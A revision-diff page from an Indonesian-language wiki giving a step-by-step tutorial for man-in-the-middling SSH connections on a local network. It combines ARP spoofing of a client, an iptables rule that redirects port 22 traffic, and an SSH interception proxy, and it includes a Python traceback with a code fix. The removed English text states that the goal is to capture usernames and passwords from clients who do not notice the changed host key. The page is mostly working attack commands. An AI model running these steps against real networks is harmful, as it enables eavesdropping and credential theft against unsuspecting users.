Difference between revisions of "MITM: mitm ssh"

From OnnoWiki
Jump to navigation Jump to search
 
(24 intermediate revisions by the same user not shown)
Line 2: Line 2:
  
  
 +
==Diagram==
  
 +
client --> mitmproxy --> ssh server
  
Quick and Easy SSH MITM
 
Published: Thu 13 March 2014
 
By Andrew Smith
 
  
In Blog.
+
* ip client: 192.168.0.106 (misalnya)
 +
* ip server: 192.168.0.100 (misalnya)
  
tags: ssh mitm
 
  
A quick intro to using mitmproxy to man-in-the-middle an SSH connection.
+
==ARPspoofing==
  
So you want to sniff an SSH connection (that you have access to) but wireshark is giving you junk? Luckily someone has written a tool for that. The mitmproxy by Maximilian Hils allows you to plop a fake server in between your SSH client and the SSH server you're connecting to.
+
ARP Spoof
  
I wanted to have a nose at the data sent from git to github over SSH. This is what I did.
+
sudo su
 +
arpspoof -t 192.168.0.106 192.168.0.100 & >/dev/null
  
# Download mitmproxy
+
Set firewall agar bisa NAT
git clone https://github.com/mitmproxy/mitmproxy.git
 
  
#Generate mitm keys (these go to ~/.mitmkeys)
+
sudo su
./mitmkeys
+
sysctl -w net.ipv4.ip_forward=1
 +
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
  
Now you want to install the SSH key you just generated to the server you want to mitm.
+
==Download==
  
#Install SSH key
+
cd /root/
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
+
wget https://github.com/saironiq/mitmproxy/archive/master.zip
 +
unzip master.zip
  
Then run the proxy, pointing it at the victimserver.
+
==Generate Keys==
  
#Run proxy
+
cd ~/mitmproxy-master/
./mitmproxy_ssh -H victimserver
+
./mitmkeygen
  
This runs the proxy on localhost:2222
+
key akan di simpan di
  
Now simply connect to the local proxy:
+
~/.mitmkeys/
 +
 
 +
==Instal SSH key server yang akan di serang==
 +
 
 +
Copykan:
 +
 
 +
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
 +
 
 +
Contoh:
  
ssh localhost -p 2222
+
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub onno@192.168.0.100
  
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.
+
==Jalankan proxy==
  
  
  
 +
Jalankan proxy, arahkan ke victimserver.
  
 +
cd ~/mitmproxy-master/
 +
./mitmproxy_ssh -H victimserver
 +
./mitmproxy_ssh -H 192.168.0.100 -s
  
 +
ini akan menjalankan proxy di localhost:2222
  
 +
Harusnya bisa dilihat dengan
  
 +
ssh localhost -p 2222
  
*** setup information
 
-diagram
 
client --> mitmproxy --> ssh server
 
  
- target server ip: 192.168.202.124
 
  
 +
Now simply connect to the local proxy:
  
1- install dependency packages
+
  ssh localhost -p 2222
$ sudo pip install twisted
 
$ sudo apt-get install python-service-identity
 
$ pip install pycrypto
 
  
2- download the mitmproxy
+
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.
$ git clone https://github.com/saironiq/mitmproxy.git
 
  
3- if you can not run mitmreplay_ssh, it might be there is changing structure of pycrypto of the version you install, so
+
==Instalasi==
- modify file mitmproxy/mitmproxy/sshdebug.py
 
  -- line 655 modify it to below
 
mpints.append(cnumber.bytes_to_long(
 
  -- line 11 add the following line
 
from Crypto.Util import number as cnumber
 
  
4- generate keys
+
$ sudo pip install twisted
$ cd mitmproxy
+
$ sudo apt-get install python-service-identity
$ sudo ./mitmproxy
+
$ pip install pycrypto
  
5- update ip_forward rule and nat
 
$ sudo sysctl -w net.ipv4.ip_forward=1
 
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
 
  
6- run the mitmproxy_ssh and point to target server 192.168.202.124
+
==Jika Error ==
$ sudo ./mitmproxy_ssh -H 192.168.202.124 -s
 
  
7- now when our client login to ssh server, if they the don't suspect the new key from server, it is very transparent to client
 
  
- snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124
+
./mitmproxy_ssh -H 192.168.0.100 -s
 +
Server running on localhost:2222...
 +
Original client connected to proxy server.
 +
Unhandled Error
 +
Traceback (most recent call last):
 +
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 101, in callWithLogger
 +
    return callWithContext({"system": lp}, func, *args, **kw)
 +
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithContext
 +
    return context.call({ILogContext: newCtx}, func, *args, **kw)
 +
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
 +
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
 +
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
 +
    return func(*args,**kw)
 +
--- <exception caught here> ---
 +
    File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 597, in _doReadOrWrite
 +
    why = selectable.doRead()
 +
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 209, in doRead
 +
    return self._dataReceived(data)
 +
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in _dataReceived
 +
    rval = self.protocol.dataReceived(data)
 +
  File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 724, in dataReceived
 +
    self.dispatchMessage(messageNum, packet[1:])
 +
  File "/root/mitmproxy-master/mitmproxy/mitmproxy.py", line 1142, in dispatchMessage
 +
    payload)
 +
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 71, in log_packet
 +
    self.output += func(payload)
 +
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 278, in msg_kexdh_init
 +
    mpints, payload = get_mpint(payload)
 +
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 655, in get_mpint
 +
    mpints.append(Util.number.bytes_to_long(
 +
exceptions.AttributeError: 'module' object has no attribute 'number'
 +
 +
Client disconnected.  
  
 +
Ini terjadi karena perubahan struktur pycrypto, ubah file mitmproxy/mitmproxy/sshdebug.py
  
 +
-- line 655 ubah menjadi
 +
mpints.append(cnumber.bytes_to_long(
  
 +
-- line 11 tambahkan
 +
from Crypto.Util import number as cnumber
  
 
==Referensi==
 
==Referensi==

Latest revision as of 08:24, 7 April 2017

sumber: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html


Diagram

client --> mitmproxy --> ssh server


  • ip client: 192.168.0.106 (misalnya)
  • ip server: 192.168.0.100 (misalnya)


ARPspoofing

ARP Spoof 

sudo su
arpspoof -t 192.168.0.106 192.168.0.100 & >/dev/null

Set firewall agar bisa NAT 

sudo su
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

Download

cd /root/
wget https://github.com/saironiq/mitmproxy/archive/master.zip
unzip master.zip

Generate Keys

cd ~/mitmproxy-master/
./mitmkeygen

key akan di simpan di 

~/.mitmkeys/

Instal SSH key server yang akan di serang

Copykan: 

ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver

Contoh: 

ssh-copy-id -i ~/.mitmkeys/id_rsa.pub onno@192.168.0.100

Jalankan proxy

Jalankan proxy, arahkan ke victimserver. 

cd ~/mitmproxy-master/
./mitmproxy_ssh -H victimserver
./mitmproxy_ssh -H 192.168.0.100 -s

ini akan menjalankan proxy di localhost:2222

Harusnya bisa dilihat dengan 

ssh localhost -p 2222


Now simply connect to the local proxy: 

ssh localhost -p 2222

And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.

Instalasi

$ sudo pip install twisted
$ sudo  apt-get install python-service-identity
$ pip install pycrypto


Jika Error

./mitmproxy_ssh -H 192.168.0.100 -s
Server running on localhost:2222...
Original client connected to proxy server.
Unhandled Error
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 101, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
   File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 597, in _doReadOrWrite
    why = selectable.doRead()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 209, in doRead
    return self._dataReceived(data)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 724, in dataReceived
    self.dispatchMessage(messageNum, packet[1:])
  File "/root/mitmproxy-master/mitmproxy/mitmproxy.py", line 1142, in dispatchMessage
    payload)
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 71, in log_packet
    self.output += func(payload)
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 278, in msg_kexdh_init
    mpints, payload = get_mpint(payload)
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 655, in get_mpint
    mpints.append(Util.number.bytes_to_long(
exceptions.AttributeError: 'module' object has no attribute 'number'

Client disconnected.

Ini terjadi karena perubahan struktur pycrypto, ubah file mitmproxy/mitmproxy/sshdebug.py 

-- line 655 ubah menjadi
mpints.append(cnumber.bytes_to_long(

-- line 11 tambahkan
from Crypto.Util import number as cnumber

Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=MITM:_mitm_ssh&oldid=47568"